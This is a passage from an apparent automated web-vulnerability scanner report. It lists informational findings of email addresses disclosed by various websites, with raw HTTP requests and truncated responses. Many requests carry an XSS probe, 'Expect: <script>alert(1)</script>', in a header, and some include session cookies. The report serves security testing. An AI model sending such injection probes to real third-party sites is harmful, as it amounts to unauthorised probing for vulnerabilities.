User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:21 GMT
Content-Length: 68567
Content-Type: application/x-javascript
Last-Modified: Tue, 19 Dec 2006 04:38:00 GMT
Accept-Ranges: bytes
ETag: "0445f762723c71:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

/* Prototype JavaScript framework, version 1.5.0_rc2
* (c) 2005, 2006 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For detail
...[SNIP]...
27.14. http://www.crankyape.com/javascripts/validation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /javascripts/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/validation.js HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:21 GMT
Content-Length: 10728
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Jan 2007 23:44:00 GMT
Accept-Ranges: bytes
ETag: "020f689ec31c71:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

/*
* Really easy field validation with Prototype
* http://tetlaw.id.au/view/javascript/really-easy-field-validation
* Andrew Tetlaw
* Version 1.5.4.1 (2007-01-05)
*
* Copyright (c) 2007 Andrew
...[SNIP]...
a valid date.', function(v) {
               var test = new Date(v);
               return Validation.get('IsEmpty').test(v) || !isNaN(test);
           }],
   ['validate-email', 'Please enter a valid email address. For example fred@domain.com .', function (v) {
               return Validation.get('IsEmpty').test(v) || /\w{1,}[@][\w\-]{1,}([.]([\w\-]{1,})){1,3}$/.test(v)
           }],
   ['validate-url', 'Please enter a valid URL.', function (v) {
               ret
...[SNIP]...
27.15. https://www.crankyape.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /default.asp?pg=DispSingleItem&ItemNumber=26361 HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:37 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Insurance total loss rvs, motorcycles, atvs, snowmobiles, boats, trucks, trailers.
...[SNIP]...
<meta name="author" content="webmaster@crankyape.com">
...[SNIP]...
27.16. https://www.crankyape.com/javascripts/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /javascripts/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/prototype.js HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:40 GMT
Content-Length: 68567
Content-Type: application/x-javascript
Last-Modified: Tue, 19 Dec 2006 04:38:00 GMT
Accept-Ranges: bytes
ETag: "0445f762723c71:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

/* Prototype JavaScript framework, version 1.5.0_rc2
* (c) 2005, 2006 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For detail
...[SNIP]...
27.17. https://www.crankyape.com/javascripts/validation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /javascripts/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/validation.js HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:40 GMT
Content-Length: 10728
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Jan 2007 23:44:00 GMT
Accept-Ranges: bytes
ETag: "020f689ec31c71:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

/*
* Really easy field validation with Prototype
* http://tetlaw.id.au/view/javascript/really-easy-field-validation
* Andrew Tetlaw
* Version 1.5.4.1 (2007-01-05)
*
* Copyright (c) 2007 Andrew
...[SNIP]...
a valid date.', function(v) {
               var test = new Date(v);
               return Validation.get('IsEmpty').test(v) || !isNaN(test);
           }],
   ['validate-email', 'Please enter a valid email address. For example fred@domain.com .', function (v) {
               return Validation.get('IsEmpty').test(v) || /\w{1,}[@][\w\-]{1,}([.]([\w\-]{1,})){1,3}$/.test(v)
           }],
   ['validate-url', 'Please enter a valid URL.', function (v) {
               ret
...[SNIP]...
27.18. http://www.ec51.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ec51.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ec51.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation Failed
Server: squid/3.1.11
Mime-Version: 1.0
Date: Sun, 01 May 2011 18:42:03 GMT
Content-Type: text/html
Content-Length: 3730
X-Squid-Error: ERR_INVALID_REQ 0
Vary: Accept-Language
Content-Language: en
X-Cache: MISS from 127.0.0.1
X-Cache-Lookup: NONE from 127.0.0.1:80
Via: 1.0 127.0.0.1 (squid/3.1.11)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>ERROR: The requested
...[SNIP]...
<a href="mailto:337805@qq.com?subject=CacheErrorInfo%20-%20ERR_INVALID_REQ&amp;body=CacheHost%3A%20127.0.0.1%0D%0AErrPage%3A%20ERR_INVALID_REQ%0D%0AErr%3A%20%5Bnone%5D%0D%0ATimeStamp%3A%20Sun,%2001%20May%202011%2018%3A42%3A03%20GM
...[SNIP]...
.21.0%20OpenSSL%2F0.9.8o%20zlib%2F1.2.3%0D%0AHost%3A%20www.ec51.com%0D%0AAccept%3A%20*%2F*%0D%0AProxy-Connection%3A%20Keep-Alive%0D%0AExpect%3A%20%3Cscript%3Ealert(1)%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A">337805@qq.com</a>
...[SNIP]...
27.19. http://www.girlfriendsecret.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.girlfriendsecret.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.girlfriendsecret.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Server: nginx/0.7.67
Date: Mon, 02 May 2011 00:33:30 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Location: http://www.livejasmin.com/listpage.php?psid=bronetwork&pstour=t1&psprogram=REVS&pstool=30_1
Content-Length: 411

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.livejasmin.com/listpage.php?psid=bronet
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...
27.20. http://www.google.com/uds/api/visualization/1.0/6b277f80b1043ed67e7dcd564353f3d8/default,geomap.I.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /uds/api/visualization/1.0/6b277f80b1043ed67e7dcd564353f3d8/default,geomap.I.js

Issue detail

The following email address was disclosed in the response:

Request

GET /uds/api/visualization/1.0/6b277f80b1043ed67e7dcd564353f3d8/default,geomap.I.js HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 200 OK
Expires: Wed, 25 Apr 2012 00:23:32 GMT
Date: Tue, 26 Apr 2011 00:23:32 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=31536000
Age: 524498
Content-Length: 202049

(function() {
/**
* SWFObject v1.4.2: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
* http:
...[SNIP]...
tion.datautils.compareValues",mk); })();

/**
* Copyright 2007 Google Inc. All Rights Reserved
*
* @fileoverview Tiny compatibility file for third party swfobject-1.5.js
*
* @author Doug Ricket (dricket@google.com)
*/

// These global variables are undefined in swfobject-1.5.js
var __flash_unloadHandler;
var __flash_savedUnloadHandler;

/**
* @license SWFObject v1.5: Flash Player detection and embed -
* http
...[SNIP]...
27.21. http://www.headsets.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.headsets.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.headsets.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:42:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 499
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webserver@headsets.com">
...[SNIP]...
27.22. http://www.herematures.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herematures.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herematures.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.1
Date: Sun, 01 May 2011 23:02:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8844
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Sun, 01 May 2011 23:02:29 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Matures Pictures</title>
<!-
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20herematures.com">
...[SNIP]...
27.23. http://www.heresquirt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heresquirt.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heresquirt.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Sun, 01 May 2011 23:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8750
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Sun, 01 May 2011 23:48:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Squirt Pictures</title>
<!--
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20heresquirt.com">
...[SNIP]...
27.24. http://www.herestuds.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herestuds.tv
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herestuds.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:13:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8762
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:13:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Studs Movies</title>
<!-- SR
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20herestuds.tv">
...[SNIP]...
27.25. http://www.hlsm.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hlsm.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.hlsm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://www.hlsm.com/main.htm
Date: Mon, 02 May 2011 03:10:46 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 06 Apr 2011 16:31:12 GMT
ETag: "1066e5a78f4cb1:dc0"
Content-Length: 35204

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0021)http://www.hlsm1.com/ -->
<HTML><HEAD><TITLE>OnlineMicrofiche Index</TITLE>
<META http-equiv=Content-Type co
...[SNIP]...
<a href="mailto:epfsales@hlsm.com">
...[SNIP]...
<a href="Mailto:info@xtremepowersports.com%20">info@xtremepowersports.com
</a>
...[SNIP]...
27.26. http://www.hotwheelscollectors.com/HWCErrorPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=nt3qwb55gans5433wc3ilm55

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:20 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0e93660;expires=Mon, 02-May-11 03:03:50 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 mdw107102 (MII-APC/1.6)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
<a href="mailto:Support@HotWheelsCollectors.com" class="redlink">Support@HotWheelsCollectors.com</a>
...[SNIP]...
<a class="footer" href="mailto:comments@hotwheelscollectors.com">comments@hotwheelscollectors.com</a>
...[SNIP]...
27.27. http://www.jacksonnewspapers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jacksonnewspapers.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jacksonnewspapers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Sun, 01 May 2011 23:16:26 GMT
Content-Type: text/html
Content-Length: 1400
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache6.ghm.zope.net
Via: 1.0 cache6.ghm.zope.net:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...
27.28. http://www.japanator.com/elephant/login.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The following email address was disclosed in the response:

Request

GET /elephant/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:55:17 GMT
Server: lighttpd/1.4.28
Content-Length: 47739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login | Japan
...[SNIP]...
<a href="mailto:tips@japanator.com" style="color:#ffffff;">tips@japanator.com</a>
...[SNIP]...
27.29. http://www.japanator.com/elephant/signup.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The following email address was disclosed in the response:

Request

GET /elephant/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:06:57 GMT
Server: lighttpd/1.4.28
Content-Length: 46289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Signup for an
...[SNIP]...
<a href="mailto:tips@japanator.com" style="color:#ffffff;">tips@japanator.com</a>
...[SNIP]...
27.30. http://www.links4vids.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.links4vids.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.links4vids.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:17:53 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Content-Type: text/html; charset=iso-8859-1
Content-Length: 500

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...
27.31. http://www.lsitools.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lsitools.com
Path:   /favicon.ico

Issue detail

The following email addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lsitools.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: 1BC
X-Powered-By: ASP.NET
Content-Length: 2821
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASDCTAC=FIGHIEJCAKIFODBPPKNPODEM; path=/
Cache-control: private

<html>
<head>
   <title>LSI Tools | Expert solutions for the vacation rental industry.</title>
   <meta NAME="keywords" CONTENT="Expert Solutions for the Vacation Rental Industry">
   <meta NAME="descri
...[SNIP]...
<A HREF="mailto:info@LSITools.com">Info@LSITools.com</A>
...[SNIP]...
27.32. http://www.marrow.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marrow.org
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.marrow.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 01 May 2011 23:21:02 GMT
Server: Apache
Content-Type: text/html
Content-Length: 11064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>

<title>NMDP - File Not Found</title>
<meta name="description" content="
...[SNIP]...
<A href="mailto:webmaster@nmdp.org">webmaster@nmdp.org</A>
...[SNIP]...
27.33. http://www.mashastube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mashastube.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mashastube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:42:31 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Content-Length: 529
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@advancedhosters.com">
...[SNIP]...
27.34. http://www.momvictress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.momvictress.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
